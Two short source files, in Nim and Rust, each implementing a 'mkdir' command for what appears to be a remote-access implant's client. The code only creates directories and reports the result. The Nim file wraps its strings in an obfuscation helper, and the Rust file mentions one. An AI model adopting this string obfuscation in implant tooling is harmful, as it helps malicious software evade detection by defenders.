File: client/commands/mkdir.nim
from os import createDir
from strutils import join

# Create a new system directory, including subdirectories
proc mkdir*(args : varargs[string]) : string =
    var path = args.join(obf(" "))
    if path == "":
        result = obf("Invalid number of arguments received. Usage: 'mkdir [path]'.")
    else:
        createDir(path)
        result = obf("Created directory '") & path & obf("'.")

File: client-rs/src/app/commands/mkdir.rs
use fmtools::format; // using obfstr to obfuscate
use std::fs;

pub(crate) fn mkdir(path: &str) -> String {
    if path.is_empty() {
        return format!("Invalid number of arguments received. Usage: 'mkdir [path]'.");
    }

    if let Err(e) = fs::create_dir_all(path) {
        format!("Failed to create directory: "{e})
    } else {
        format!("Directory '"{path}"' created successfully.")
    }
}